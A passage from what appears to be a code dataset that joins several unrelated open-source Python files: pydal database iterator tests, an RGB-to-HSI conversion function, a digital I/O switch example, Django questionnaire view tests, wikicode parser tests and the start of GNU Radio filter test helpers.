for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Testing IterRows.__nonzero__ before basic iteration
rows = db(db.t0).iterselect(orderby=db.t0.id)
if rows:
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Empty IterRows
rows = db(db.t0.name == "IterRows").iterselect(orderby=db.t0.id)
self.assertEqual(bool(rows), False)
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Testing IterRows.__getitem__
rows = db(db.t0).iterselect(orderby=db.t0.id)
self.assertEqual(rows[0].name, names[0])
self.assertEqual(rows[1].name, names[1])
# recall the same item
self.assertEqual(rows[1].name, names[1])
self.assertEqual(rows[2].name, names[2])
self.assertRaises(IndexError, rows.__getitem__, 1)
# Testing IterRows.next()
rows = db(db.t0).iterselect(orderby=db.t0.id)
for n in names:
self.assertEqual(next(rows).name, n)
self.assertRaises(StopIteration, next, rows)
# Testing IterRows.compact
rows = db(db.t0).iterselect(orderby=db.t0.id)
rows.compact = False
for n in names:
self.assertEqual(next(rows).t0.name, n)
@unittest.skipIf(IS_MSSQL, "Skip mssql")
def testMultiSelect(self):
# Iterselect holds the cursors until all elements have been evaluated
# inner queries use new cursors
db = self.connect()
t0 = db.define_table("t0", Field("name"), Field("name_copy"))
db(db.t0).delete()
db.commit()
names = ["web2py", "pydal", "Massimo"]
for n in names:
t0.insert(name=n)
c = 0
for r in db(db.t0).iterselect():
db.t0.update_or_insert(db.t0.id == r.id, name_copy=r.name)
c += 1
self.assertEqual(c, len(names), "The iterator is not looping over all elements")
self.assertEqual(db(db.t0).count(), len(names))
c = 0
for x in db(db.t0).iterselect(orderby=db.t0.id):
for y in db(db.t0).iterselect(orderby=db.t0.id):
db.t0.update_or_insert(db.t0.id == x.id, name_copy=x.name)
c += 1
self.assertEqual(c, len(names) * len(names))
self.assertEqual(db(db.t0).count(), len(names))
db._adapter.test_connection()
@unittest.skipIf(IS_SQLITE | IS_MSSQL, "Skip sqlite & ms sql")
def testMultiSelectWithCommit(self):
db = self.connect()
t0 = db.define_table("t0", Field("nn", "integer"))
for n in xrange(1, 100, 1):
t0.insert(nn=n)
db.commit()
s = db.t0.nn.sum()
tot = db(db.t0).select(s).first()[s]
c = 0
for r in db(db.t0).iterselect(db.t0.ALL):
db.t0.update_or_insert(db.t0.id == r.id, nn=r.nn * 2)
db.commit()
c += 1
self.assertEqual(c, db(db.t0).count())
self.assertEqual(tot * 2, db(db.t0).select(s).first()[s])
db._adapter.test_connection()
if __name__ == "__main__":
unittest.main()
tearDownModule()
| web2py/pydal | tests/sql.py | Python | bsd-3-clause | 137,514 | 0.001136 |
"""Placeholder."""
import numpy as np
def rgb_to_hsi(im):
"""Convert to HSI the RGB pixels in im.
Adapted from
https://en.wikipedia.org/wiki/HSL_and_HSV#Hue_and_chroma.
"""
im = np.moveaxis(im, -1, 0)
if len(im) not in (3, 4):
raise ValueError("Expected 3-channel RGB or 4-channel RGBA image;"
" received a {}-channel image".format(len(im)))
im = im[:3]
hues = (np.arctan2(3**0.5 * (im[1] - im[2]),
2 * im[0] - im[1] - im[2]) / (2 * np.pi)) % 1
intensities = im.mean(0)
saturations = np.where(
intensities, 1 - im.min(0) / np.maximum(intensities, 1e-10), 0)
return np.stack([hues, saturations, intensities], -1)
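# Illustrative usage sketch (not part of the original module). Assuming an
# H x W x 3 RGB array with float channel values in [0, 1], the function returns
# an H x W x 3 array of (hue, saturation, intensity) triples:
#   im = np.array([[[1.0, 0.0, 0.0]]])   # a single pure-red pixel
#   hsi = rgb_to_hsi(im)
#   # hsi[0, 0] is approximately [0.0, 1.0, 0.333]: hue 0 (red), full
#   # saturation, intensity equal to the mean of the three channels.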
| DigitalSlideArchive/HistomicsTK | histomicstk/preprocessing/color_conversion/rgb_to_hsi.py | Python | apache-2.0 | 725 | 0 |
import LNdigitalIO
def switch_pressed(event):
event.chip.output_pins[event.pin_num].turn_on()
def switch_unpressed(event):
event.chip.output_pins[event.pin_num].turn_off()
if __name__ == "__main__":
LNdigital = LNdigitalIO.LNdigitals()
listener = LNdigitalIO.InputEventListener(chip=LNdigital)
for i in range(4):
listener.register(i, LNdigitalIO.IODIR_ON, switch_pressed)
listener.register(i, LNdigitalIO.IODIR_OFF, switch_unpressed)
listener.activate()
| LeMaker/LNdigitalIO | examples/presslights.py | Python | gpl-3.0 | 501 | 0 |
from urllib import quote
from django.test import Client
from questionnaire.forms.assign_question import AssignQuestionForm
from questionnaire.models import Questionnaire, Section, SubSection, Question, Region, QuestionGroup
from questionnaire.models.skip_rule import SkipQuestion
from questionnaire.tests.base_test import BaseTest
from questionnaire.tests.factories.question_group_factory import QuestionGroupFactory
from questionnaire.tests.factories.skip_rule_factory import SkipQuestionRuleFactory, SkipSubsectionRuleFactory
class AssignQuestionViewTest(BaseTest):
def setUp(self):
self.client = Client()
self.user = self.create_user(org="WHO")
self.region = None
self.assign('can_edit_questionnaire', self.user)
self.client.login(username=self.user.username, password='pass')
self.questionnaire = Questionnaire.objects.create(name="JRF 2013 Core English", year=2013, region=self.region)
self.section = Section.objects.create(name="section", questionnaire=self.questionnaire, order=1)
self.subsection = SubSection.objects.create(title="subsection 1", section=self.section, order=1)
self.question1 = Question.objects.create(text='Q1', UID='C00003', answer_type='Number', region=self.region)
self.question2 = Question.objects.create(text='Q2', UID='C00002', answer_type='Number', region=self.region)
self.form_data = {'questions': [self.question1.id, self.question2.id]}
self.url = '/subsection/%d/assign_questions/' % self.subsection.id
def test_get_assign_question_page(self):
response = self.client.get(self.url)
self.assertEqual(200, response.status_code)
templates = [template.name for template in response.templates]
self.assertIn('questionnaires/assign_questions.html', templates)
def test_gets_assign_questions_form_and_subsection_in_context(self):
afro = Region.objects.create(name="Afro")
question_in_region = Question.objects.create(text='not in Region Q', UID='C000R3', answer_type='Number',
region=afro)
response = self.client.get(self.url)
self.assertIsInstance(response.context['assign_question_form'], AssignQuestionForm)
self.assertEqual(2, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertNotIn(question_in_region.text, questions_texts)
self.assertEqual('Done', response.context['btn_label'])
def test_GET_puts_list_of_already_used_questions_in_context(self):
question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region)
question1.question_group.create(subsection=self.subsection)
response = self.client.get(self.url)
self.assertEqual(1, len(response.context['active_questions']))
self.assertIn(question1, response.context['active_questions'])
self.assertIn(question1, response.context['questions'])
def test_GET_does_not_put_parent_questions_in_the_context(self):
parent_question = Question.objects.create(text='parent q', UID='C000R3', answer_type='Number')
self.question1.parent = parent_question
self.question1.save()
used_question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region, parent=parent_question)
used_question1.question_group.create(subsection=self.subsection)
response = self.client.get(self.url)
self.assertEqual(3, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertIn(used_question1.text, questions_texts)
self.assertNotIn(parent_question.text, questions_texts)
self.assertEqual(1, len(response.context['active_questions']))
self.assertIn(used_question1, response.context['active_questions'])
def test_post_questions_assigns_them_to_subsections_and_get_or_create_group(self):
self.failIf(self.question1.question_group.all())
self.failIf(self.question2.question_group.all())
meta = {'HTTP_REFERER': self.url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
question_group = self.question1.question_group.all()
self.assertEqual(1, question_group.count())
self.assertEqual(question_group[0], self.question2.question_group.all()[0])
self.assertEqual(self.subsection, question_group[0].subsection)
def test_successful_post_redirect_to_referer_url(self):
meta = {'HTTP_REFERER': self.url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
self.assertRedirects(response, self.url)
def test_successful_post_display_success_message(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
message = "Questions successfully assigned to questionnaire."
self.assertIn(message, response.cookies['messages'].value)
def test_with_errors_returns_the_form_with_error(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={'questions': []}, **meta)
self.assertIsInstance(response.context['assign_question_form'], AssignQuestionForm)
self.assertIn("This field is required.", response.context['assign_question_form'].errors['questions'])
self.assertEqual(2, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertEqual('Done', response.context['btn_label'])
def test_login_required(self):
self.assert_login_required(self.url)
def test_permission_required_for_create_section(self):
self.assert_permission_required(self.url)
user_not_in_same_region = self.create_user(username="asian_chic", group=self.REGIONAL_ADMIN, region="ASEAN",
org="WHO")
self.assign('can_edit_questionnaire', user_not_in_same_region)
self.client.logout()
self.client.login(username='asian_chic', password='pass')
response = self.client.get(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
response = self.client.post(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
def test_GET_with_hide_param_puts_list_of_only_unused_questions_in_context(self):
question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region)
question1.question_group.create(subsection=self.subsection)
hide_url = '/subsection/%d/assign_questions/?hide=1' % self.subsection.id
response = self.client.get(hide_url)
self.assertIn(question1, response.context['active_questions'])
self.assertNotIn(question1, response.context['questions'])
class UnAssignQuestionViewTest(BaseTest):
def setUp(self):
self.client = Client()
self.user = self.create_user(org="WHO")
self.assign('can_edit_questionnaire', self.user)
self.client.login(username=self.user.username, password='pass')
self.questionnaire = Questionnaire.objects.create(name="JRF 2013 Core English", year=2013, region=None)
self.section = Section.objects.create(name="section", questionnaire=self.questionnaire, order=1)
self.subsection = SubSection.objects.create(title="subsection 1", section=self.section, order=1)
self.question1 = Question.objects.create(text='Q1', UID='C00003', answer_type='Number', region=None)
self.question2 = Question.objects.create(text='Q2', UID='C00002', answer_type='Number', region=None)
self.question_group = self.question1.question_group.create(subsection=self.subsection, order=1)
self.question1.orders.create(question_group=self.question_group, order=1)
self.question_group.question.add(self.question2)
self.question2.orders.create(question_group=self.question_group, order=2)
self.url = '/subsection/%d/question/%d/unassign/' % (self.subsection.id, self.question1.id)
def test_post_unassign_question_to_group_and_removes_question_order(self):
meta = {'HTTP_REFERER': '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)}
response = self.client.post(self.url, {}, **meta)
group_questions = self.question_group.question.all()
self.assertNotIn(self.question1, group_questions)
self.assertEqual(0, self.question1.orders.all().count())
def test_successful_post_redirect_to_referer_url(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={}, **meta)
self.assertRedirects(response, referer_url)
def test_successful_post_display_success_message(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={}, **meta)
message = "Question successfully unassigned from questionnaire."
self.assertIn(message, response.cookies['messages'].value)
def test_login_required(self):
self.assert_login_required(self.url)
def test_permission_required_for_create_section(self):
self.assert_permission_required(self.url)
user_not_in_same_region = self.create_user(username="asian_chic", group=self.REGIONAL_ADMIN, region="ASEAN",
org="WHO")
self.assign('can_edit_questionnaire', user_not_in_same_region)
self.client.logout()
self.client.login(username='asian_chic', password='pass')
response = self.client.post(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
def test_permission_denied_if_subsection_belongs_to_a_user_but_question_to_another_user(self):
afro = Region.objects.create(name="Afro")
core_question = Question.objects.create(text='core Q', UID='C000C2', answer_type='Number', region=afro)
self.question_group.question.add(core_question)
url = '/subsection/%d/question/%d/unassign/' % (self.subsection.id, core_question.id)
response = self.client.post(url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(url))
def test_deletes_skip_rules_when_unassigning_the_root_question(self):
SkipQuestionRuleFactory(subsection=self.subsection, root_question=self.question1, skip_question=self.question2)
meta = {'HTTP_REFERER': '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)}
self.client.post(self.url, {}, **meta)
self.assertEqual(len(SkipQuestion.objects.all()), 0)
def test_deletes_skip_rules_when_unassigning_the_skip_question(self):
SkipQuestionRuleFactory(subsection=self.subsection, root_question=self.question2, skip_question=self.question1)
meta = {'HTTP_REFERER': '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)}
self.client.post(self.url, {}, **meta)
self.assertEqual(len(SkipQuestion.objects.all()), 0)
def test_deletes_skip_rules_and_empty_groups_when_unassigning_the_root_question_to_skip_subsection(self):
SkipSubsectionRuleFactory(subsection=self.subsection, root_question=self.question1)
order = self.question_group.order + 1
QuestionGroupFactory(subsection=self.subsection, order=order)
meta = {'HTTP_REFERER': '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)}
self.client.post(self.url, {}, **meta)
self.assertEqual(SkipQuestion.objects.count(), 0)
self.assertEqual(QuestionGroup.objects.count(), 1)
| eJRF/ejrf | questionnaire/tests/views/test_assign_questions_view.py | Python | bsd-3-clause | 13,049 | 0.004598 |
#! /usr/bin/env python3
import mwparserfromhell
from ws.parser_helpers.wikicode import *
class test_get_adjacent_node:
def test_basic(self):
snippet = "[[Arch Linux]] is the best!"
wikicode = mwparserfromhell.parse(snippet)
first = wikicode.get(0)
last = get_adjacent_node(wikicode, first)
assert str(last) == " is the best!"
def test_last_node(self):
snippet = "[[Arch Linux]] is the best!"
wikicode = mwparserfromhell.parse(snippet)
last = get_adjacent_node(wikicode, " is the best!")
assert last == None
def test_whitespace_preserved(self):
snippet = "[[Arch Linux]] \t\n is the best!"
wikicode = mwparserfromhell.parse(snippet)
first = wikicode.get(0)
last = get_adjacent_node(wikicode, first, ignore_whitespace=True)
assert str(last) == " \t\n is the best!"
def test_ignore_whitespace(self):
snippet = "[[Arch Linux]] \t\n [[link]] is the best!"
wikicode = mwparserfromhell.parse(snippet)
first = wikicode.get(0)
wikicode.remove("[[link]]")
last = get_adjacent_node(wikicode, first, ignore_whitespace=True)
assert str(last) == " is the best!"
class test_get_parent_wikicode:
snippet = """\
{{Note|This [[wikipedia:reference]] is to be noted.}}
Some other text.
"""
wikicode = mwparserfromhell.parse(snippet)
def test_toplevel(self):
parent = get_parent_wikicode(self.wikicode, self.wikicode.get(0))
assert str(parent) == self.snippet
def test_nested(self):
note = self.wikicode.filter_templates()[0]
link = self.wikicode.filter_wikilinks()[0]
parent = get_parent_wikicode(self.wikicode, link)
assert str(parent) == str(note.params[0])
class test_remove_and_squash:
@staticmethod
def _do_test(wikicode, remove, expected):
node = wikicode.get(wikicode.index(remove))
remove_and_squash(wikicode, node)
assert str(wikicode) == expected
def test_inside(self):
snippet = "Some text with a [[link]] inside."
expected = "Some text with a inside."
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link]]", expected)
def test_around(self):
snippet = """\
First paragraph
[[link1]]
Second paragraph
[[link2]]
Third paragraph
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "First paragraph\n\nSecond paragraph\n[[link2]]\n\nThird paragraph\n")
self._do_test(wikicode, "[[link2]]", "First paragraph\n\nSecond paragraph\n\nThird paragraph\n")
def test_lineend(self):
snippet = """\
Some other text [[link]]
Following sentence.
"""
expected = """\
Some other text
Following sentence.
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link]]", expected)
def test_linestart(self):
snippet = """\
Another paragraph.
[[link]] some other text.
"""
expected = """\
Another paragraph.
some other text.
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link]]", expected)
def test_lineend_twolinks(self):
snippet = """\
Some other text [[link1]][[link2]]
Following sentence.
"""
expected = """\
Some other text [[link1]]
Following sentence.
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", expected)
def test_linestart_twolinks(self):
snippet = """\
Another paragraph.
[[link1]][[link2]] some other text.
"""
expected = """\
Another paragraph.
[[link2]] some other text.
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", expected)
def test_multiple_nodes(self):
snippet = "[[link1]][[link2]][[link3]]"
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "[[link2]][[link3]]")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", "[[link1]][[link3]]")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link3]]", "[[link1]][[link2]]")
def test_multiple_nodes_text(self):
snippet = "foo [[link1]][[link2]][[link3]] bar"
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "foo [[link2]][[link3]] bar")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", "foo [[link1]][[link3]] bar")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link3]]", "foo [[link1]][[link2]] bar")
def test_multiple_nodes_spaces(self):
snippet = "foo [[link1]] [[link2]] [[link3]] bar"
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "foo [[link2]] [[link3]] bar")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", "foo [[link1]] [[link3]] bar")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link3]]", "foo [[link1]] [[link2]] bar")
def test_multiple_nodes_newlines(self):
snippet = "[[link1]]\n[[link2]]\n[[link3]]"
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "[[link2]]\n[[link3]]")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", "[[link1]]\n[[link3]]")
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link3]]", "[[link1]]\n[[link2]]")
def test_multiple_newlines(self):
snippet = """\
First paragraph
[[link]]
"""
expected = """\
First paragraph
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link]]", expected)
class test_get_section_headings:
@staticmethod
def _do_test(text, expected):
result = get_section_headings(text)
assert result == expected
def test_balanced(self):
snippet = """
foo
== Section 1 ==
bar
=== Section 2===
=Section 3 =
== Section 4 ===
"""
expected = ["Section 1", "Section 2", "Section 3", "Section 4 ="]
self._do_test(snippet, expected)
def test_unbalanced(self):
snippet = """
Invalid section 1 ==
== Invalid section 2
== Valid section 1 =
= Valid section 2 ==
== Valid section 3 = =
= = Valid section 4 ==
"""
expected = [
"= Valid section 1",
"Valid section 2 =",
"= Valid section 3 =",
"= Valid section 4 =",
]
self._do_test(snippet, expected)
def test_levels(self):
snippet = """
= Level 1 =
== Level 2 ==
=== Level 3 ===
==== Level 4 ====
===== Level 5 =====
====== Level 6 ======
======= Invalid level =======
"""
expected = [
"Level 1",
"Level 2",
"Level 3",
"Level 4",
"Level 5",
"Level 6",
"= Invalid level =",
]
self._do_test(snippet, expected)
class test_get_anchors:
def test_simple(self):
snippet = """
== foo ==
== bar ==
== foo ==
== foo_2 ==
== foo 2 ==
"""
expected = ["foo", "bar", "foo_2", "foo_2_2", "foo_2_3"]
result = get_anchors(get_section_headings(snippet))
assert result == expected
def test_complex(self):
snippet = """
== foo_2 ==
== foo_2_2 ==
== foo ==
== foo ==
== foo 2 ==
== foo 2 ==
"""
expected = ["foo_2", "foo_2_2", "foo", "foo_3", "foo_2_3", "foo_2_4"]
result = get_anchors(get_section_headings(snippet))
assert result == expected
def test_casing(self):
snippet = """
=== foo bar ===
=== Foo Bar ===
=== Foo bar ===
=== foo Bar ===
"""
expected = ["foo_bar", "Foo_Bar_2", "Foo_bar_3", "foo_Bar_4"]
result = get_anchors(get_section_headings(snippet))
assert result == expected
def test_strip(self):
snippet = """
== Section with ''wikicode'' ==
== Section with <i>tag</i> ==
== Section with HTML entities &Sigma;, &#931;, and &#x3a3; ==
== Section with [[Main page|wikilink]] ==
== Section with <nowiki><nowiki></nowiki> ==
== #section starting with hash ==
"""
expected = [
"Section_with_wikicode",
"Section_with_tag",
"Section_with_HTML_entities_.CE.A3.2C_.CE.A3.2C_and_.CE.A3",
"Section_with_wikilink",
"Section_with_.3Cnowiki.3E",
".23section_starting_with_hash",
]
result = get_anchors(get_section_headings(snippet))
assert result == expected
def test_strip_pretty(self):
snippet = """
== Section with ''wikicode'' ==
== Section with <i>tag</i> ==
== Section with HTML entities &Sigma;, &#931;, and &#x3a3; ==
== Section with [[Main page|wikilink]] ==
== Section with <nowiki><nowiki></nowiki> ==
== #section starting with hash ==
"""
expected = [
"Section with wikicode",
"Section with tag",
"Section with HTML entities Σ, Σ, and Σ",
"Section with wikilink",
"Section with <nowiki>", # FIXME: should be encoded, i.e. "Section with %3Cnowiki%3E",
"#section starting with hash",
]
result = get_anchors(get_section_headings(snippet), pretty=True)
assert result == expected
def test_encoding(self):
snippet = """
== Section with | pipe ==
== Section with [brackets] ==
== Section with <invalid tag> ==
"""
expected = [
"Section with %7C pipe",
"Section with %5Bbrackets%5D",
"Section with <invalid tag>",
]
result = get_anchors(get_section_headings(snippet), pretty=True)
assert result == expected
def test_invalid(self):
snippet = """
== Section with trailing spaces ==
== Invalid 1 == foo
==
Invalid 2 ==
== Invalid 3
==
==
Invalid 4
==
== Invalid 5
foo ==
"""
expected = [
"Section with trailing spaces",
]
result = get_anchors(get_section_headings(snippet), pretty=True)
assert result == expected
class test_ensure_flagged:
def test_add(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]{{bar}}"
def test_preserve(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar}}"
def test_strip_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar}}"
def test_replace_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar", "param1", "param2")
assert str(wikicode) == "[[foo]] {{bar|param1|param2}}"
def test_named_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar", "2=param1", "1=param2")
assert str(wikicode) == "[[foo]] {{bar|2=param1|1=param2}}"
def test_dead_link(self):
wikicode = mwparserfromhell.parse("[[foo]]{{Dead link|2000|01|01}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "Dead link", "2017", "2", "3", overwrite_parameters=False)
assert str(wikicode) == "[[foo]]{{Dead link|2000|01|01}}"
class test_ensure_unflagged:
def test_noop(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]"
def test_preserve(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{baz}}"
def test_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]"
def test_no_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar (Language)}}"
def test_match_only_prefix(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar", match_only_prefix=True)
assert str(wikicode) == "[[foo]]"
def test_match_only_prefix_no_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar", match_only_prefix=True)
assert str(wikicode) == "[[foo]] {{baz (Language)}}"
class test_is_flagged:
def test_noop(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_false(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_true(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is True
def test_false_exact_match(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_match_only_prefix(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar", match_only_prefix=True) is True
def test_match_only_prefix_false(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar", match_only_prefix=True) is False
class test_is_redirect:
redirects = [
# any number of spaces
"#redirect[[foo]]",
"#redirect [[foo]]",
"#redirect [[foo]]",
# optional colon
"#redirect: [[foo]]",
"#redirect :[[foo]]",
"#redirect : [[foo]]",
# any capitalization
"#reDiRect [[foo]]",
"#REDIRECT [[foo]]",
# leading whitespace
"\n \n #redirect [[foo]]",
# any section and alternative text (which is ignored)
"#redirect [[foo#section]]",
"#redirect [[foo#section|ignored]]",
# templates
# FIXME: probably not possible to pair '{{' and '}}' with a regex
# "#redirect [[{{echo|Foo}}bar]]",
]
nonredirects = [
"#redirect [[]]",
"#redirect [[]]",
"#redirect [[<nowikifoo]]",
"#redirect :: [[foo]]",
"#redirect [[foo{}]]",
]
def test_redirects(self):
for text in self.redirects:
assert is_redirect(text, full_match=False)
assert is_redirect(text, full_match=True)
text += "\n"
assert is_redirect(text, full_match=False)
assert is_redirect(text, full_match=True)
text += "bar"
assert is_redirect(text, full_match=False)
assert not is_redirect(text, full_match=True)
def test_nonredirects(self):
for text in self.redirects:
assert not is_redirect("foo" + text, full_match=False)
assert not is_redirect("foo" + text, full_match=True)
for text in self.nonredirects:
assert not is_redirect("foo" + text, full_match=False)
assert not is_redirect("foo" + text, full_match=True)
class test_parented_ifilter:
wikicode = mwparserfromhell.parse("""<span>
foo {{bar|some text and {{another|template}}}}
</span>
{{foo|bar}}
""")
def test_recursive(self):
nodes = []
for parent, node in parented_ifilter(self.wikicode,
recursive=True):
nodes.append(node)
assert parent.index(node) >= 0
assert nodes == self.wikicode.filter(recursive=True)
def test_nonrecursive(self):
nodes = []
for parent, node in parented_ifilter(self.wikicode,
recursive=False):
nodes.append(node)
assert parent.index(node) >= 0
assert nodes == self.wikicode.filter(recursive=False)
def test_recursive_templates(self):
templates = []
for parent, template in parented_ifilter(self.wikicode,
forcetype=mwparserfromhell.nodes.template.Template,
recursive=True):
templates.append(template)
assert parent.index(template) >= 0
assert templates == self.wikicode.filter_templates(recursive=True)
def test_nonrecursive_templates(self):
templates = []
for parent, template in parented_ifilter(self.wikicode,
forcetype=mwparserfromhell.nodes.template.Template,
recursive=False):
templates.append(template)
assert parent.index(template) >= 0
assert templates == self.wikicode.filter_templates(recursive=False)
|
lahwaacz/wiki-scripts
|
tests/parser_helpers/test_wikicode.py
|
Python
|
gpl-3.0
| 18,144 | 0.001488 |
#!/usr/bin/env python
#
# Copyright 2005-2007,2010,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from __future__ import print_function
from __future__ import division
from gnuradio import gr, gr_unittest, filter, blocks
import math
import random
import sys
def random_floats(n):
r = []
for x in range(n):
# r.append(float(random.randint(-32768, 32768)))
r.append(float(random.random()))
return tuple(r)
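# Reference implementations: run the input through the plain FIR filter blocks in a
# throwaway flowgraph; their output is what the rational resampler is expected to reproduce.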
def reference_dec_filter(src_data, decim, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.fir_filter_fff(decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
def reference_interp_filter(src_data, interp, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.interp_fir_filter_fff(interp, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
def reference_interp_dec_filter(src_data, interp, decim, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
up = filter.interp_fir_filter_fff(interp, (1,))
dn = filter.fir_filter_fff(decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, up, dn, dst)
tb.run()
